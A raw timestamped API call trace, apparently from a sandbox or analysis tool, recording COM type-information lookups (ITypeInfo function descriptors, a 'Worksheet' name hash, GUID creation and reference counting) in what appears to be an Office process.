returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x40, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x41, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x42, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x43, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x44, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x45, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.710] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x46, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.710] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x47, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x48, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x49, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4a, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4b, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4c, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4d, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4e, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x4f, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x50, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x51, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.711] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.711] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x52, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x53, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x54, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x55, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x56, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x57, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x58, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x59, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5a, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.751] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5b, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.751] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5c, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5d, ppFuncDesc=0x1dd348, pDummy=0x160 | out: ppFuncDesc=0x1dd348, pDummy=0x160) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5e, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x5f, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x60, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x61, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x62, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x63, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x64, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x65, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x66, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x67, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x68, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x69, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6a, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.752] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6b, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.752] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6c, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6d, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6e, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x6f, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x70, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x71, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x72, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x73, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x74, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x75, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x76, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x77, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x78, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x79, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7a, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.753] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.753] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7b, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7c, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7d, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7e, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x7f, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x80, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x81, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x82, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x83, ppFuncDesc=0x1dd348, pDummy=0x160 | out: ppFuncDesc=0x1dd348, pDummy=0x160) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x84, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x85, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x86, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x87, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x88, ppFuncDesc=0x1dd348, pDummy=0x160 | out: ppFuncDesc=0x1dd348, pDummy=0x160) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x89, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8a, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.754] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.754] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8b, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.755] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.755] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8c, ppFuncDesc=0x1dd348, pDummy=0x160 | out: ppFuncDesc=0x1dd348, pDummy=0x160) returned 0x0 [0157.755] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.755] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8d, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.755] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.755] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8e, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.755] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.755] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x8f, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.755] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.755] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x90, ppFuncDesc=0x1dd348, pDummy=0x1a0 | out: ppFuncDesc=0x1dd348, pDummy=0x1a0) returned 0x0 [0157.755] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.755] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x91, ppFuncDesc=0x1dd348, pDummy=0x50 | out: ppFuncDesc=0x1dd348, pDummy=0x50) returned 0x0 [0157.755] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.755] ITypeInfo:RemoteGetFuncDesc (in: This=0xa02b2c0, index=0x92, ppFuncDesc=0x1dd348, pDummy=0x160 | out: ppFuncDesc=0x1dd348, pDummy=0x160) returned 0x0 [0157.755] ITypeInfo:LocalReleaseFuncDesc (This=0xa02b2c0) returned 0x0 [0157.755] IUnknown:QueryInterface (in: This=0xa02b210, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dd368 | out: ppvObject=0x1dd368*=0xa02b210) returned 0x0 [0157.755] ITypeInfo2:GetCustData (in: This=0xa02b210, GUID=0x7fee51cd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x1dd378 | out: pVarVal=0x1dd378*(varType=0x0, wReserved1=0x0, wReserved2=0x92, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0157.755] IUnknown:Release (This=0xa02b210) returned 0x3 [0157.755] ITypeInfo:RemoteGetDocumentation (in: This=0xa02b210, memid=-1, refPtrFlags=0x1dd370, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0157.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Worksheet", cchWideChar=10, lpMultiByteStr=0x1dd280, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Worksheet", lpUsedDefaultChar=0x0) returned 10 [0157.755] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Worksheet") returned 0x10fec1 [0157.756] IUnknown:QueryInterface (in: This=0xa02b318, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd320 | out: ppvObject=0x1dd320*=0x0) returned 0x80004002 [0157.756] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b318, ppTypeAttr=0x1dd348, pDummy=0x10 | out: ppTypeAttr=0x1dd348, pDummy=0x10) returned 0x0 [0157.756] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b318) returned 0x0 [0157.756] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.756] IUnknown:Release (This=0xa02b318) returned 0x3 [0157.756] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.756] IUnknown:AddRef (This=0xa02b318) returned 0x4 [0157.756] IUnknown:Release (This=0xa02b318) returned 0x3 [0157.756] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.756] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.756] IUnknown:AddRef (This=0xa02b210) returned 0x3 [0157.756] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b210, ppTypeAttr=0x1dd648, pDummy=0xa167150 | out: ppTypeAttr=0x1dd648, pDummy=0xa167150*=0x7) returned 0x0 [0157.756] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b210) returned 0x0 [0157.756] IUnknown:Release (This=0xa02b210) returned 0x2 [0157.756] CoCreateGuid (in: pguid=0x1dd800 | out: pguid=0x1dd800*(Data1=0xdc3766c9, Data2=0x14ce, Data3=0x4fe0, Data4=([0]=0x8a, [1]=0xfd, [2]=0xc5, [3]=0x2d, [4]=0xac, [5]=0xd8, [6]=0x35, [7]=0xea))) returned 0x0 [0157.756] CoCreateGuid (in: pguid=0x1dd800 | out: pguid=0x1dd800*(Data1=0x37ca5722, Data2=0x9b71, Data3=0x4bc2, Data4=([0]=0x81, [1]=0x1b, [2]=0x3, [3]=0x2b, [4]=0xb4, [5]=0x55, [6]=0xda, [7]=0xde))) returned 0x0 [0157.756] IMalloc:Alloc (This=0x7fefecb5380, cb=0x14) returned 0x7f02fa0 [0157.756] IUnknown:AddRef (This=0xa02b2c0) returned 0x3 [0157.756] IUnknown:Release (This=0xa02b2c0) returned 0x2 [0157.756] IUnknown:QueryInterface (in: This=0xa02b2c0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dd938 | out: ppvObject=0x1dd938*=0x0) returned 0x80004002 [0157.756] IUnknown:AddRef (This=0xa02b318) returned 0x4 